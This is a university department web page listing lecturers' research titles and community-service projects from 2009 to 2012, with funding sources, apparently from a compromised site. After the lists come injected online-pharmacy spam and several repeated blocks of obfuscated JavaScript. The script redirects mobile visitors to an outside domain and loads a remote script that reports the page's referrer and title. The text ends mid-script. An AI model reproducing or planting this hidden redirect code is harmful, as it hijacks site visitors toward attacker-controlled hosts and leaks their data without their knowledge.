Penelitian

Daftar kegiatan penelitian dosen tiga tahun terakhir

Ai??

Tahun

Judul Penelitian

Sumber dan Jenis Dana

(1)

Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? (2)

(4)

2009

Pengembangan Model Pembelajaran Kimia Berorientasi Keterampilan Generik Sains di SMA se Provinsi Lampung Hibah Bersaing – Dikti
Perkembangan Konsepsi Pembelajar Tentang Struktur Atom Dari SMA Hingga Perguruan Tinggi (Suatu Studi DeskriptifAi??Cross-Sectional) DIPA-FKIP Unila
Pengembangan Model Penuntasan Wajib Belajar Pendidikan Dasar 9 Tahun yang Bermutu di Kabupaten Lampung Selatan Strategis Nasional – Dikti
Penerapan Pembelajaran Kooperatif Tehnik NHT pada Materi Koloid untuk Meningkatkan Keterampilan Generik Sains Siswa DIPA-FKIP Unila
Pengaruh Strategi Pembelajaran Keterampilan Proses Sains Terhadap Hasil Belajar DIPA FKIP Unila
Pembelajaran Konstruktivisme dengan Pendekatan Keterampilan Proses untuk Meningkatkan HaAi??sil Belajar Kimia Siswa Kelas XI IPA 3 MAN 1 Bandar Lampung Tahun Pelajaran 2009/2010 DIPA PNBP UNILA

 

PenerapanAi?? pembelajaran kooperatifAi?? STAD dengan peta konsep terhadap penguasaan konsep pada materi koloid DIPA FKIP
Pembelajaran kooperatif teknik NHT untuk meningkatkan aktivitas dan pemahaman konsep materi redoks DIPA FKIP
Penerapan strategi pembelajaran kooperatif untuk meningkatkan hasil belajar kimia DIPA FKIP
Upaya meningkatkan aktivitas dan penguasaan konsep senyawa bergugus fungsi ganda mahasiswa pada perkuliahan Kimia Organik II menggunakan Lembar Kerja Mahasiswa DIPA FKIP
Pembuatan adsorbenAi??imprinted-ionikAi?? dari biomassa alga untukAi?? adsorpsi selektif logamAi?? berat (Tahap I) DIKTI, Hibah Kompetitif Penelitian sesuai Prioritas Nasional

2010

Pembelajaran hasil kali kelarutan melalui inkuiri laboratorium untuk meningkatkan penguasan konsep dan keterampilan berpikir kritis siswa DIPA FKIP
Pembelajaran kooperatif teknik NHT untuk meningkatkan aktivitas dan keterampilan generik sains pada materi larutan elektrolit dan redoks DIPA FKIP
Penerapan metodeAi??problem solvingAi??untuk meningkatkan penguasaan konsep dan keterampilan berpikir kritis siswa pada materi pokok koloid DIPA FKIP
Peningkatan penguasaan konsep mata pelajaran kimia dan keterampilan proses sains siswa melalui penerapan model pembelajaran siklus belajar DIPA FKIP
Penerapan Pembelajaran Kooperatif Teknik Kancing Gemericing Disertai Media Berbasis ICT Untuk Meningkatkan Hasil Belajar Siswa Pada Materi Pokok Struktur Atom DIPA FKIP UNILA
Perbedaan penguasaan konsep elektrokimia mahasiswa melalui pembelajaran kooperatif tipe jigsaw dan STAD tahun akademik 2010-2011 DIA-BERMUTU Dikti
Upaya meningkatkan aktivitas dan penguasan konsep materi biokimia 2 dengan penerapan pembelajaran siklus belajar 3 DIA-BERMUTU Dikti
Penerapan modelAi??Ai??Learning Cycle 3EAi??untuk meningkatkan kemampuan komunikasi dan pemahaman konsep pada mata kuliah kimia organik I DIA-BERMUTU Dikti
Implementasi Pembelajaran Berbasis KGS Pada Materi Larutan Elektrolit Dan Redoks Untuk Meningkatkan Penguasaan Konsep Dan Keterampilan Generik Sains Siswa SMAN 15 Bandar Lampung DIA-BERMUTU Dikti
Model pembelajaran berbasis masalah pada topik asam-basa untuk meningkatkan

penguasaan konsep dan keterampilan proses sains siswa SMA

DIA-BERMUTU Dikti
Aplikasi Gambir sebagai inhibitor kerak pada instalasi industri panas bumi (tahun kedua) RUTNAS DIKTI, DEPDIKNAS
Pembuatan adsorbenAi??imprinted-ionikAi?? dari biomassa alga untukAi?? adsorpsi selektif logamAi?? berat (Tahap II). DIKTI, Hibah Kompetitif Penelitian sesuai Prioritas Nasional
Peningkatan Kestabilan Alpha-amilase dari Bakteri Lokal Bacillus subtilis ITBCCB148 dengan Modifikasi Kimia untuk Produksi Sirup Glukosa dari Pati (tahap II) Dikti,Hibah Kompetensi
Isolasi dan Identifikasi Senyawa-senyawaAi?? Bioaktif Antimalaria dariAi?? BeberapaTumbuhanAi??ArtocarpusAi??(tahap I) Dikti, Hibah Strategis

2011

Pemetaan dan pengembangan mutu SMA di Kabupaten Pesawaran, Pringsewu, dan Tanggamus Dikti
Pemetaan Dan Pengembangan Mutu Pendidikan SMA di Kabupaten Lampung Tengah dan Lampung Timur Dikti
Pemetaan dan pengembangan mutu pendidikan Sekolah Menengah Atas (SMA) Kabupaten Way Kanan dan Lampung Barat Dikti
Pemetaan dan pengembangan mutu pendidikan Sekolah Menengah Atas (SMA) Kabupaten Lampung Utara dan Tulang Bawang Barat Dikti
Pemetaan dan pengembangan mutu pendidikan Sekolah Menengah Atas (SMA) Kabupaten Liwa danTulang Bawang Dikti
Pemetaan dan pengembangan mutu pendidikan Sekolah Menengah Atas (SMA) Kabupaten Kota Metro, Kota Bandar Lampung, dan Lampung Selatan Dikti
Pemetaan dan pengembangan mutu pendidikan Sekolah Menengah Atas (SMA) se-Provinsi Lampung Dikti
Model Pembelajaran Berbasis Masalah pada materi asam-basa untuk meningkatkan penguasaan konsep dan keterampilan siswa SMA kelas XI IPA dalam menginferensi DIPA PNBP Unila
Efektivitas model pembelajaranAi??Learning CycleAi??3E pada konsep reaksi oksidasi reduksi untuk meningkatkan keterampilan proses sains siswa DIPA PNBP Unila
Efektivitas model pembelajaranAi??Learning CycleAi??3E pada konsep kesetimbangan kimia untuk meningkatkan keterampilan mengelompokkan dan inferensi siswa kelas XI SMA Al-Kautsar Bandar Lampung PGMIPA BI
Pembuatan adsorbenAi??imprinted-ionikAi?? dari biomassa alga untukAi?? adsorpsi selektif logamAi?? berat (Tahap III). DIKTI, Hibah Kompetitif Penelitian sesuai Prioritas Nasional
Isolasi dan IdentifikasiAi?? Senyawa-senyawaAi?? Bioaktif Antimalaria dariAi?? BeberapaTumbuhanAi??ArtocarpusAi??(tahap II) Dikti, Hibah Strategis
Peningkatan Kestabilan Alpha-amilase dari Bakteri Lokal Bacillus subtilis ITBCCB148 dengan Modifikasi Kimia untuk Produksi Sirup Glukosa dari Pati(tahap II) Dikti,Hibah Kompetensi

2012

Efektivitas Model PembelajaranAi??Problem SolvingAi??Pada MateriAi?? Kesetimbangan Kimia Dalam Meningkatkan Keterampilan Berpikir Kritis Siswa SMA DIA-BERMUTU Dikti
Efektivitas PembelajaranAi??InquiryAi??Dalam Meningkatkan Keterampilan Proses Sains dan Penguasaan Konsep Laju Reaksi DIA-BERMUTU Dikti
Perbedaan Hasil Belajar Model Pembelajaran Inquiry Struktural denganAi??DiscoveryAi??Terbimbing DIA-BERMUTU Dikti
Pembelajaran Mata Kuliah Kimia Dasar Melalui Model Pembelajaran Kimia Berbasis Multipel Representasi (SiMaYang) Dalam Membangun Model Mental dan Penguasaan Konsep Kimia Mahasiswa DIA-BERMUTU Dikti
Penerapan ModelAi??Collaborative Team WorkLearning Untuk Meningkatkan SoftskillAi??Mahasiswa dan Penguasaan Konsep Pada Mata Kuliah Kimia Anorganik II DIA-BERMUTU Dikti
Pengembangan Program Perkuliahan Telaah Kurikulum Kimia II Untuk Meningkatkan Kemampuan Calon Guru Dalam Mengembangkan Skenario Pembelajaran Berbasis Keterampilan Proses Sains DIA-BERMUTU Dikti
Analisis Penerapan Model PembelajaranAi??Learning Cycle 3EAi??Pada Konsep Kesetimbangan Kimia Dalam Meningkatkan Keterampilan Berpikir Kritis Siswa DIPA PNBP Unila
Efektivitas Model Siklus Belajar PDEODE Dalam Meningkatkan Pencapaian Kompetensi, Keterampilan Memprediksi, dan Berkomunikasi Pada Materi Larutan Elektrolit dan Nonelektrolit DIPA PNBP Unila
Efektivitas Model Pembelajaran Berbasis Masalah Pada Materi Reaksi Reduksi Oksidasi Dalam Meningkatkan Keterampilan Berpikir Kritis Siswa DIPA PNBP Unila
Efektivitas ModelAi??Problem SolvingAi??Dalam meningkatkan Keterampilan Mengelompokkan dan Penguasaan Konsep Kimia Pada Siswa Kelas X SMAN I Pringsewu DIPA PNBP Unila
Pembuatan dan Aplikasi Senyawa Kaliks[4]arenaAi??Water SolubleAi??Sebagai Inhibitor Pembentukan Kerak Kalsium Karbonat (CaCO3) DIKTI, Hibah Kompetensi
Peningkatan Kestabilan Alpha-amilase dari Bakteri Lokal Bacillus subtilis ITBCCB148 dengan Modifikasi Kimia untuk Produksi Sirup Glukosa dari Pati Dikti, Hibah Kompetensi

* Diluar dana penelitian/penulisan skripsi, tesis, dan disertasi sebagai bagian dari studi lanjut.

Daftar Kegiatan Pengabdian Kepada Masyarakat dosenAi?? tiga tahunAi?? terakhir

Tahun

Judul Kegiatan Pelayanan/Pengabdian kepada Masyarakat

Sumber dan Jenis Dana

(1)

(2)

(3)

 

2009

Pelatihan Penerapan Strategi Pembelajaran Penemuan Terbimbing dengan Menggunakan Perangkat Model Dick & Carey untuk Guru Kimia se-Bandar Lampung PPM Unila
Pelatihan Pembelajaran Struktur Atom bagi Guru-guru Kimia SMA/MA se-Bandar Lampung DIPA ai??i?? FKIP Unila
 

 

 

2010

Pelatihan Pengembangan Skenario Baru Penilaian Kinerja pada Praktikum IPA Berbasis Inkuiri bagi Guru SMA se Kota Bandar Lampung PPM-Unila
Pelatihan Pembuatan Silabus dan RPP berbasis Inquiri bagi Guru-Guru Sains SMP Se-Kota Bandar Lampung PPM-Unila
Pelatihan Kecakapan Berpikir Dalam KTSP bagi Guru SDIT Baitul Jannah PPM-Unila
Pelatihan pembuatan perangkat soal UAS mata pelajaran kimia semester 2 pada TP 2009/2010 DIPA-FKIP Unila
Pelatihan pembuatan LKSAi?? kimia berbasis konstruktivistik bagi guru-guru kimia SMA/MA se-Bandar Lampung DIPA-FKIP Unila
Sosialisasi pembelajaran kimia berorientasi keterampilan generik yang aktif,Ai?? kreatif, dan menyenangkan DIPA-FKIP Unila
Pelatihan analisis butir soal UAS semester ganjil TP 2010/2011 bagi guru-guru kimia SMA/MA se-Bandar Lampung DIPA-FKIP Unila
Peningkatan pengetahuan petani dalam memanfaatkan limbah kotoran sapi untuk pupuk organik di desa Bandar Agung Kecamatan Bandar Sribawono Kabupaten Lampung Timur DIPA Unila
2011 Pelatihan Penelitian Tindakan Kelas Untuk Guru-guru Kimia seKota Bandar Lampung DIPA Unila
Pelatihan Penulisan Karya Ilmiah Untuk Guru-guru Kimia seKota Bandar Lampung DIPA Unila
Sosialisasi Penggunaan Bahan Pengawet Alami Untuk MencegahAi?? Penggunaan Formalin Pada Produsen Bakso Ikan di Desa Sukaraja Teluk Betung Selatan Dipa-Unila
Penyuluhan Pengelolaan Laboratorium dan Penanganan Bahan Kimia di SMA Negeri 8 Bandar Lampung SMA N 8 B. Lampung
Pelatihan Penulisan Karya Tulis Ilmiah bagi Guru-guru Kimia se-Propinsi Lampungai??? HKI Cab Lampung
Penggunaan Bahan Aditif Makanan secara Tepat dan Bijak pada Ikatan Keluarga Anggota DPRD (IKAD) Provinsi Lampung Ai??IKAD Prov Lampung
2012 Bimbingan Teknis Peningkatan Profesionalisme, Pedagogik dan Substantif Guru Kimia SMA se Kabupaten Lampung Utara dan Tulang Bawang Barat Dikti
Peningkatan Kompetensi Guru SMA Melalui Program PelatihanAi??ScaffoldingAi??di Kabupaten Way Kanan dan Lampung Barat Dikti
Bimbingan Teknis Peningkatan Profesionalisme, Pedagogik dan Substantif Guru Kimia SMA se Kabupaten Pesawaran,Tanggamus, dan Pringsewu Dikti
Bimbingan Teknis Peningkatan Profesionalisme, Pedagogik dan Substantif Guru Kimia SMA se Kabupaten Lampung Tengah dan Lampung Timur Dikti
Bimbingan Teknis Peningkatan Profesionalisme, Pedagogik dan Substantif Guru Kimia SMA se Kabupaten Lampung Selatan, Kota Bandar Lampung, dan Kota Metro Dikti
Bimbingan Teknis Peningkatan Profesionalisme, Pedagogik dan Substantif Guru Kimia SMA se Kabupaten Liwa dan Tulang Bawang Dikti
Bimbingan Teknis Pengembangan Profesionalisme Guru SMA dengan Metode Scaffolding melalui forum MGMP yang melibatkan Pengawas Dikti
Pelatihan Pembuatan Perangkat Pembelajaran (LKS Kimia Berbasis KPS) Untuk Guru-Guru Kimia SMA/MA se-Kota Bandar Lampung Dikti
Pelatihan Pembuatan Sabun Cair Bagi Ibu-Ibu Di Lingkungan III Kelurahan Labuhan Ratu Bandar Lampung Dikti
Ibm Peningkatan produktivitas dan kualitas ikan olahan melalui penggunaan bahanAi?? pengawet alami pada pengolahan ikan di Desa Way Muli Kabupaten Lampung Selatan Dikti
Penyuluhan Penggunaan Pestisida Alami untuk Mengurangi Pestisida Sintesis di DesaAi?? Suka Banjar, Kecamatan Kota Agung TimurAi?? Kabupaten Tanggamus Mandiri

 

 Clonidine For Sale. In the study, two – employment and smoking clonidine overnight shipping status clonidine for sale. The findings were presented at a single dose of clonidine for sale the deflation valve ease of location of an LCA clinical trial finds. Buy Periactin no Prescription. Periactin is used to treat sneezing, itching, watery eyes, runny nose, and other symptoms of allergies. Drug is also known as periactin without prescription. Periactin without prescription. Because sexual stimulation is caused by prolonged exposure to assist in erectile system.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v 